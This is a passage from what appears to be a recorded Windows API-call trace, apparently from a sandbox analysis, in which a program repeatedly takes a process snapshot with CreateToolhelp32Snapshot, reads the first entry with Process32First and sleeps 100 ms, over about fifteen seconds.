cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.610] Sleep (dwMilliseconds=0x64) [0267.654] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0267.664] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.796] Sleep (dwMilliseconds=0x64) [0267.835] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0267.849] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.032] Sleep (dwMilliseconds=0x64) [0268.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0268.094] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.179] Sleep (dwMilliseconds=0x64) [0268.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0268.276] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.351] Sleep (dwMilliseconds=0x64) [0268.448] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0268.552] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.620] Sleep (dwMilliseconds=0x64) [0268.640] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0268.651] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.904] Sleep (dwMilliseconds=0x64) [0269.080] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0269.096] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.205] Sleep (dwMilliseconds=0x64) [0269.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0269.772] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.274] Sleep (dwMilliseconds=0x64) [0270.416] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0270.503] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.648] Sleep (dwMilliseconds=0x64) [0270.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0270.759] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.897] Sleep (dwMilliseconds=0x64) [0270.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0270.968] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.115] Sleep (dwMilliseconds=0x64) [0271.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0271.135] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.329] Sleep (dwMilliseconds=0x64) [0271.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0271.455] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.643] Sleep (dwMilliseconds=0x64) [0271.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0271.670] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.757] Sleep (dwMilliseconds=0x64) [0271.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0271.773] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.986] Sleep (dwMilliseconds=0x64) [0272.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0272.047] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.164] Sleep (dwMilliseconds=0x64) [0272.433] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0272.443] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.688] Sleep (dwMilliseconds=0x64) [0272.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0272.853] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.171] Sleep (dwMilliseconds=0x64) [0273.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0273.275] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.422] Sleep (dwMilliseconds=0x64) [0273.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0273.507] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.627] Sleep (dwMilliseconds=0x64) [0273.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0273.712] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.939] Sleep (dwMilliseconds=0x64) [0274.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0274.020] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.180] Sleep (dwMilliseconds=0x64) [0274.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0274.257] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.427] Sleep (dwMilliseconds=0x64) [0274.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0274.495] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.585] Sleep (dwMilliseconds=0x64) [0274.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0274.601] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.741] Sleep (dwMilliseconds=0x64) [0274.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0274.803] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.983] Sleep (dwMilliseconds=0x64) [0275.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0275.083] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.159] Sleep (dwMilliseconds=0x64) [0275.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0275.181] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.303] Sleep (dwMilliseconds=0x64) [0275.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0275.398] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.517] Sleep (dwMilliseconds=0x64) [0275.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0275.572] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.724] Sleep (dwMilliseconds=0x64) [0275.729] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0275.741] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.819] Sleep (dwMilliseconds=0x64) [0275.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0275.884] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.045] Sleep (dwMilliseconds=0x64) [0276.093] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0276.107] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.269] Sleep (dwMilliseconds=0x64) [0276.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0276.291] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.359] Sleep (dwMilliseconds=0x64) [0276.378] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0276.390] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.513] Sleep (dwMilliseconds=0x64) [0276.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0276.571] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.641] Sleep (dwMilliseconds=0x64) [0276.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0276.700] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.771] Sleep (dwMilliseconds=0x64) [0276.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0276.822] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.915] Sleep (dwMilliseconds=0x64) [0276.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0277.008] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.100] Sleep (dwMilliseconds=0x64) [0277.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0277.123] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.198] Sleep (dwMilliseconds=0x64) [0277.240] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0277.305] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.384] Sleep (dwMilliseconds=0x64) [0277.437] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0277.524] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0277.593] Sleep (dwMilliseconds=0x64) [0277.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0277.617] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.070] Sleep (dwMilliseconds=0x64) [0278.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0278.310] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.380] Sleep (dwMilliseconds=0x64) [0278.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0278.490] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.578] Sleep (dwMilliseconds=0x64) [0278.598] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0278.614] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0278.782] Sleep (dwMilliseconds=0x64) [0278.834] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0278.848] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.104] Sleep (dwMilliseconds=0x64) [0279.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2208 [0279.146] Process32First (in: hSnapshot=0x2208, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.228] Sleep (dwMilliseconds=0x64) [0279.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0279.301] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.562] Sleep (dwMilliseconds=0x64) [0279.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0279.742] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.247] Sleep (dwMilliseconds=0x64) [0280.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0280.377] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.492] Sleep (dwMilliseconds=0x64) [0280.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0280.572] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.678] Sleep (dwMilliseconds=0x64) [0280.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0280.727] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.887] Sleep (dwMilliseconds=0x64) [0280.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0280.915] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.016] Sleep (dwMilliseconds=0x64) [0281.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0281.086] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.529] Sleep (dwMilliseconds=0x64) [0281.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0281.684] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.859] Sleep (dwMilliseconds=0x64) [0281.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0281.896] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.988] Sleep (dwMilliseconds=0x64) [0282.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0282.047] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.244] Sleep (dwMilliseconds=0x64) [0282.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0282.307] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.428] Sleep (dwMilliseconds=0x64) [0282.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0282.485] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 